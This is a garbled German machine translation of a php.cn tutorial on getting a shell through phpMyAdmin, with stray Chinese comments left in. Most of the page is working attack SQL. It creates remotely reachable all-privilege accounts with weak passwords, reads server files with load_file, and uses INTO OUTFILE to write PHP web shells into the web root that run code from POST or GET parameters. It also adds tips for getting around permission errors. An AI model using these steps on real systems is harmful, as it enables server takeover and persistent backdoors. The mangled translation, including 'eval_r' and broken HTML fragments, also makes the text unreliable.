Zusammenfassung PHPmyadmin übernimmt die Shell-phpMyAdmin-php.cn

Zusammenfassung PHPmyadmin übernimmt die Shell

藏色散人

Freigeben： 2021-01-04 14:37:48

nach vorne

1893 Leute haben es durchsucht

Das Folgende ist in der Spalte phpmyadmin-Nutzungsanleitung zusammengefasstphpmyadminHolen Sie sich die Shell, ich hoffe, sie wird Freunden in Not helfen! ° Benutzer „guessec“ Das Passwort lautet ooxx und erlaubt externe Verbindungen.

GRANT ALL PRIVILEGES ON *.* TO &#39;guetsec&#39;@&#39;%&#39; IDENTIFIED BY &#39;ooxx&#39; WITH GRANT OPTION;

Nach dem Login kopieren

Wir können ein Root-Konto erstellen und ein Passwort festlegen. Zusammenfassung PHPmyadmin übernimmt die Shell

GRANT ALL PRIVILEGES ON *.* TO &#39;root&#39;@&#39;%&#39; IDENTIFIED BY &#39;123456&#39; WITH GRANT OPTION;

Nach dem Login kopieren

Vier klassische Methoden zur Verwendung von Shell:

Methode eins:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on

Nach dem Login kopieren

Methode 2:

读取文件内容：    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话：    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限：    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Nach dem Login kopieren

Methode 3:

JhackJ-Version PHPmyadmin erhält Shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

Nach dem Login kopieren

Methode 4:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Nach dem Login kopieren

Dann besuchen Sie uns das Website-Verzeichnis: http:// www.2cto.com /study.php?cmd=dir

Phpmyadmin erscheint beim Exportieren eines Satzes (Fehlercode: 13 – Berechtigung verweigert)

Das bedeutet, dass für dieses Verzeichnis keine Berechtigung vorliegt . Sie können das Verzeichnis der oberen oder unteren Ebene ausprobieren

Das obige ist der detaillierte Inhalt vonZusammenfassung PHPmyadmin übernimmt die Shell. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!